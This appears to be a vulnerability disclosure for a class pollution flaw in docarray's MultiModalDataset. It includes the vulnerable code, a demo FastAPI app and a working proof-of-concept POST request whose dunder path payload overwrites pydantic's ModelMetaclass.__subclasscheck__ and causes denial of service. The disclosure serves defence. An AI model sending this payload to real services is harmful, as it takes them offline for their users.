Docarray MultiModalDataset insecurely implemented the component on preprocessing functions. In its __getitem__ method, the dotted object path passed in is not performed any sanitization to prevent against internal class object access and operation. When multimodal dataset operation is deployed through web API, such as offcially recommended FastAPI, bad actors are able to access, e.g. via double under attributes .__class__.__base__... and overwrite the internal python runtime class objects, which at least leads to DoS attack. However, when combined with other backend code enriching the python runtime states, other attacks such as RCE and XSS are still promising as our previous finding proves. (see related materials)
The __getitem__ method of MultiModalDataset class recursively searches python object via the dotted path from the input, however, lack of sanitization against unauthorized internal object access such as __class__.__base__:
# https://github.com/docarray/docarray/blob/f5fc0f6d5f3dcb0201dc735262ef3256bdf054b9/docarray/data/torch_dataset.py#L115-L128
def __getitem__(self, item: int):
doc = self.docs[item].copy(deep=True)
for field, preprocess in self._preprocessing.items():
if len(field) == 0:
doc = preprocess(doc) or doc
else:
acc_path = field.split('.')
_field_ref = doc
for attr in acc_path[:-1]:
_field_ref = getattr(_field_ref, attr)
attr = acc_path[-1]
value = getattr(_field_ref, attr)
setattr(_field_ref, attr, preprocess(value) or value)
return docImagine the scenario, users are allowed to passed in data path, such as thesis.title.text and choose one preprocessing function to process it.
import torch
from docarray import DocList, BaseDoc
from docarray.data import MultiModalDataset
from docarray.documents import TextDoc
from docarray.base_doc import DocArrayResponse
from fastapi import FastAPI
from typing import Dict, List
import uvicorn
class Thesis(BaseDoc):
title: TextDoc
class Student(BaseDoc):
thesis: Thesis
class ProcessingRequest(BaseDoc):
"""Request model that allows users to specify which preprocessing to apply and where."""
student: Student
preprocessing_paths: Dict[str, List[str]] = {}
# Define preprocessing functions
def embed_title(title: TextDoc):
"""Generate embeddings for the thesis title."""
title.embedding = torch.ones(4)
def normalize_embedding(thesis: Thesis):
"""Normalize the thesis title embeddings."""
if hasattr(thesis.title, 'embedding') and thesis.title.embedding is not None:
thesis.title.embedding = thesis.title.embedding / thesis.title.embedding.norm()
def prepend_number(text: str):
"""Prepend 'Number ' to the title text."""
return f"Number {text}"
# Map of available processing functions
AVAILABLE_PROCESSORS = {
"embed_title": embed_title,
"normalize_embedding": normalize_embedding,
"prepend_number": prepend_number
}
# Create FastAPI app
app = FastAPI(title="Thesis Processing API")
@app.post("/process_thesis/", response_model=Student, response_class=DocArrayResponse)
async def process_thesis(request: ProcessingRequest) -> Student:
"""
Process a student's thesis using MultiModalDataset with user-specified preprocessing paths.
Example request:
{
"student": {
"thesis": {
"title": {
"text": "5"
}
}
},
"preprocessing_paths": {
"thesis.title.text": ["prepend_number"]
}
}
"""
# Build preprocessing config based on user selections
preprocessing_config = {}
for path, processors in request.preprocessing_paths.items():
for processor_name in processors:
if processor_name in AVAILABLE_PROCESSORS:
# If this is the first processor for this path, initialize the list
if path not in preprocessing_config:
preprocessing_config[path] = AVAILABLE_PROCESSORS[processor_name]
else:
# We can't have multiple processors for the same path in MultiModalDataset
# This is a limitation of the library
return {"error": f"Multiple processors for path '{path}' are not supported"}
# Create a dataset with just this one student
single_doc = DocList[Student]([request.student])
# Apply the selected preprocessing using MultiModalDataset
if preprocessing_config:
ds = MultiModalDataset[Student](
single_doc,
preprocessing=preprocessing_config,
)
processed_student = ds[0]
else:
# No preprocessing selected
processed_student = request.student
return processed_student
if __name__ == "__main__":
uvicorn.run(app, host="127.0.0.1", port=8001)Bad actors might be able to manipulate the dotted path pointing to another internal object, such as thesis.__class__.__class__.__subclasscheck__ which will overwrite the issubclass(cls, class_or_tuple) builtin function behavior when the polluted class passed as parameter cls. For example, bad actors can overwrite thesis.__class__.__class__.__subclasscheck__ to any uncallable value, such as tensor, string, int, etc. The exploitation case can be seen in pydantic's ModelMetaclass. When a FastAPI web app using pydantic as its data model, the ModelMetaclass instances will always be passed into subclass() in its interal logic. Thus, attackers can first through dotted path locate to the ModelMetaclass class then pollute its __subclasscheck__ method to a uncallable value. After that, every user request sent to a FastAPI where a datamodel is depended will be out of service due to the uncallable method.
Dangerously, in Docarray, all the document classes such as TextDoc underlyingly use ModelMetaclass as their metaclass. So bad actors can easily exploit the class pollution vulnerabily existing in the MultiModalDataset class to pollute the ModelMetaclass.__subclasscheck__ by payloads like XXX.__class__.__class__.__subclasscheck__ to always get a DoS attack.
PoC in the demo provided above: As the exploitation gif shows, once the pollution is finished, the endpoint relates to pydantic models are out of service until another lifecycle of the python runtime to clear them out.
POST /process_thesis/ HTTP/1.1
Host: 127.0.0.1
Content-type: Application/json
Content-Length: 291
{
"student": {
"thesis": {
"title": {
"text": "5"
}
}
},
"preprocessing_paths": {
"thesis.__class__.__class__.__subclasscheck__": ["prepend_number"]
}
}There should be checks against unauthorized internal attributes access in the __getitem__ method of MultiModalDataset.
For more information about class pollution please refer to:
